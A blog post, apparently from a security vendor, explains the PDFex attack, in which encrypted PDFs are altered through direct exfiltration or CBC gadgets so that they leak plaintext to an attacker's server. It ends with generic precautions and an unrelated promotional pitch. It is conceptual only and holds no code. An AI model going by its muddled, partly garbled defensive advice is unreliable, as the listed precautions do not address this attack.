PDFex – A New Attack to Break PDF Encryption

Portable Document Format (PDF), a file format used to present and exchange documents, independent of software, hardware, or operating system. Invented by Adobe, PDF is an open standard maintained by the Internation Organisation for Standardizations (ISO).

Contents:

1. Definition
2. What about the Attack?
3. How the Data is Exfiltrated?
4. PDF Encryption Attack Scenario
5. Defense Mechanism, Precautions for PDF security.

Definition:

When you work with electronic documents, it’s necessary to make protection a part of your routine. You can password protect your PDFs to prevent others from copying and editing. This brings us to a recent new attack, PDFex. A new attack method dubbed PDFex that extracts the contents of encrypted PDF files in a plain text. The attack doesn’t target the encryption applied but to a PDF, but the encryption schemes supported by the PDF standard itself.

What about the attack?

The PDFex attacks can directly result in either exfiltration or exfiltration via CBC gadgets. With direct exfiltration attacks, it means some PDF readers don’t encrypt the entire contents of a document. Exfiltration is executed via a PDF form, file or, JavaScript code that has been added by the attacker to the encrypted PDF file.

According to the description of researchers, 27 widely used PDF viewers tested. Adobe Acrobat, Foxit Reader, Evince, Nitro, and Chrome with Firefox’s built-in PDF viewers were discovered to be in an unsafe condition. Following are the primary aspects of the attack:

1. An attacker can manipulate an encrypted PDF file, even without knowing the corresponding password.
2. PDF encryption uses the Cipher Block Chaining (CBC) encryption mode with no integrity checks, that allows anyone to create self-exfiltrating ciphertext parts using CBC malleability gadgets.
3. The majority of the data formats allows an attacker to include their content that can lead to exfiltration channels.

How the Data is Exfiltrated?

The PDF documents are vulnerable to two attack types – Direct Exfiltration and CBC Gadgets.

Direct Exfiltration is a technique that takes advantage of the PDFs that have not been entirely encrypted. Thus, then an attacker can modify the unencrypted file and add unencrypted objects, or wrap encrypted parts into a context that is controlled by the attacker. This process is carried out using PDF forms, or hyperlinks, or Javascript. The actions are stated in three possible ways – Submit a form, Invoke a URL, and Execute JavaScript. This document later is sent to the victim by the attacker and the data leak HTTP requests leaks. The full data in plaintext is automatically sent to the attacker’s server once the victim opens the file.

CBC Gadgets, in this technique, attackers use CBC gadgets to exfiltrate plaintext. PDF encryption generally defines no authenticated encryption. The plaintext data can be modified by the attackers within an encrypted object. The CBC attack has two necessary conditions – plaintext and exfiltration channel. The plaintext is used to manipulate an encrypted object using CBC gadgets. For AESV3, the most recent encryption algorithm, the text is always given by the Perms entry. In the Exfiltration channel, the attacker should have a channel with hyperlinks or PDF Forms.

PDF Encryption Attack Scenarios:

It is assumed that the attacker already has access to the PDF document, but they don’t know the password or the decryption keys. What the attacker can do is, modify the encrypted files by changing the document structure or add new encrypted objects and send the modified files to the victim. This further can be classified into:

1. Without user interaction– All the attacker needs to do is open the edited PDF file and display the PDF document.
2. With user interaction – The victim interacts with the PDF document (just a mouse click)

The attack is said to be successful when the attackers extract complete data as plain text from encrypted PDF or parts of the data from the encrypted PDF file.

PDF encryptions are widely used in public and private sectors for the protection of sensitive information. Providers like IBM offer PDF encryption services for PDF documents and other data (confidential images) by wrapping them into PDF. The alarming results for the evaluation of PDF viewers state the concern and root causes for possible decryption exfiltration attacks. Many data formats allow encrypting only parts of the content, for example, XML, S/MIME, PDF. This flexibility is difficult to handle and enable an attacker to include their content leading to exfiltration channels. When it comes to AES-CBC or encryption without integrity protection – is still widely supported.

All of these attacks require an attacker to be in a position to modify encrypted PDF files. The attack scenario includes a state to intercept the victim’s network traffic having physical access to a storage system. Therefore, it is wrong to say that the above criteria for protection will diminish the PDFex’s usability but also it’s these situations that will make the encryption unprotected.

Defense Mechanism, Precautions for PDF security:

Why should a PDF be Encrypted?

1. Protect sensitive information.
2. Limit access to only authorized users.
3. To enforce PDF permissions -printing, copying, editing, etc.

Encrypting a PDF file is necessarily simple for securing the data. Typically, passwords are used to encrypt PDFs and they aren’t secure. Weak passwords can easily be cracked, users can share passwords with others, PDF permissions are easily removed even if a strong password is used. Following are the precautions for the encryptions of PDF:

1. Stop unauthorized access. Restrict making multiple copies of the PDFs.
2. Set strong passwords to restrict permissions.
3. Avoid cloud sharing of the PDF carrying sensitive information.
4. Prevent from printing, copying, modifying.
5. Restrict usage rights to limited and specific users.

This was all about PDFex and how can your PDF files containing sensitive information can be protected. Further, this brings us back to how a malware can convert a PC to zombie proxies. It’s not that botnets (private computers infected by malicious malware without the knowledge of owner) that can hijack PCs for notorious purposes, but also malware strains. Regardless of whether the infected machines were used to create zombies or commit fraud, the nature of the malware means its handlers could equip it with new modules to carry other attacks. The whole point of these vulnerabilities lies in how sophisticated, and arguably slick, malware is getting. TERRIFYING! Isn’t it ??? But, don’t be. Blarrow to the rescue, always. To know more, visit https://blarrow.tech/nodersok-a-zombie-proxie-apocalypse/